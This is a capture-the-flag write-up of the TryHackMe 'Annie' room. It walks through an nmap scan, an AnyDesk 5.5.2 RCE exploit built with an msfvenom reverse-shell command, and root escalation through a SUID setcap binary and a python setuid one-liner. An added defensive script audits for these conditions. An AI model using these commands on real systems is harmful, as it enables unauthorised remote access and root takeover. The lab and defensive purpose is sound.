Annie Writeup - TryHackMe



👋 Introduction

Hi there! Annie is a room on TryHackMe rated as Medium. I found it to be easy. Without further ado, let's start!

๐Ÿ” Enumeration


As always, let's start off with an nmap scan.

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
    |   256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
    |_  256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)

7070/tcp open  ssl/realserver?
    |_ssl_date:TLS randomness does not represent time.
    |_ssl_cert: Subject: CommonName=AnyDesk Client
Service Info: OS: Linux; CPE: cpe:/o:linux:

We see that we have two open ports: SSH on port 22 and an AnyDesk server on port 7070. From the caption of this room, "Remote access comes in different flavors.", we gather that this room has something to do with remote access software like AnyDesk. Searching "AnyDesk Exploits" on Google turns up an RCE exploit for AnyDesk 5.5.2. We don't really know yet whether the box runs the vulnerable version, but sometimes it is better to just try it.

We need to modify the script for it to work: generate new shellcode using msfvenom (with our THM IP) and replace the shellcode in the exploit with the new one.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=TRYHACKME_IP_HERE LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Exploiting AnyDesk:

Set up a netcat listener on the port you set in msfvenom. Execute the Python script and wait for the connection.
If the reverse shell doesn't drop within 2-3 minutes, reset the machine and try again. (I got it right the second time.)

Dropped the Shell!

When you search for SUID files, you find an interesting file as the first result.

Setcap is a Linux binary that can be used to give capabilities to another binary. According to the Linux man page:

"Setcap sets the capabilities of each specified filename to the capabilities specified."

We can effectively escalate and drop a root shell if we give Python (or any language you know) the capability to set UID.

annie@desktop:~$ /sbin/setcap cap_setuid+ep /usr/share/python3
annie@desktop:~$ /usr/share/python3 -c 'import os;os.setuid(0); os.system("/bin/bash")'
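
Seen from the defender's side, the escalation above depends on two conditions that are easy to audit for: a SUID setcap binary, and a file capability such as cap_setuid on an interpreter. The following is an added example, not part of the original writeup: it parses `getcap -r /` output in both the older and newer libcap formats and flags both conditions. The sample output, the mode value, the capability list and the function names are constructed for illustration.

```python
import re
import stat

# Capabilities that let a process become root or bypass file permission checks.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_setfcap", "cap_sys_admin",
             "cap_sys_module", "cap_sys_ptrace", "cap_dac_override",
             "cap_dac_read_search", "cap_chown", "cap_fowner"}

# getcap prints "path = caps+ep" (older libcap) or "path caps=ep" (newer).
SPLIT = re.compile(r"\s+(?:=\s+)?(?=cap_)")
CLAUSE = re.compile(r"((?:cap_\w+,?)+)[+=]([eip]+)")

def parse_getcap(output):
    """Yield (path, capability, flags) for every capability in getcap output."""
    for line in output.splitlines():
        parts = SPLIT.split(line.strip(), maxsplit=1)
        if len(parts) != 2:
            continue  # blank line or something that is not a getcap record
        path, spec = parts
        for names, flags in CLAUSE.findall(spec):
            for cap in names.strip(",").split(","):
                yield path, cap, flags

def audit(getcap_output, setcap_mode, setcap_path="/sbin/setcap"):
    """Return (path, reason) findings for the two conditions described above."""
    findings = []
    if setcap_mode & stat.S_ISUID:
        findings.append((setcap_path, "SUID setcap: any user can grant file capabilities"))
    for path, cap, flags in parse_getcap(getcap_output):
        # Permitted (p) or effective (e) means the process actually receives it.
        if cap in DANGEROUS and set(flags) & {"e", "p"}:
            findings.append((path, f"{cap} ({flags})"))
    return findings

# Constructed sample: `getcap -r / 2>/dev/null` output and the st_mode of setcap.
SAMPLE_GETCAP = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/share/python3 = cap_setuid+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
"""
SAMPLE_SETCAP_MODE = 0o104755  # -rwsr-xr-x

if __name__ == "__main__":
    for path, reason in audit(SAMPLE_GETCAP, SAMPLE_SETCAP_MODE):
        print(f"[!] {path}: {reason}")
```

On a live host, feed `audit()` the real `getcap -r /` output and `os.stat("/sbin/setcap").st_mode`; removing the SUID bit from setcap and clearing the capability with `setcap -r` on the flagged file closes both findings.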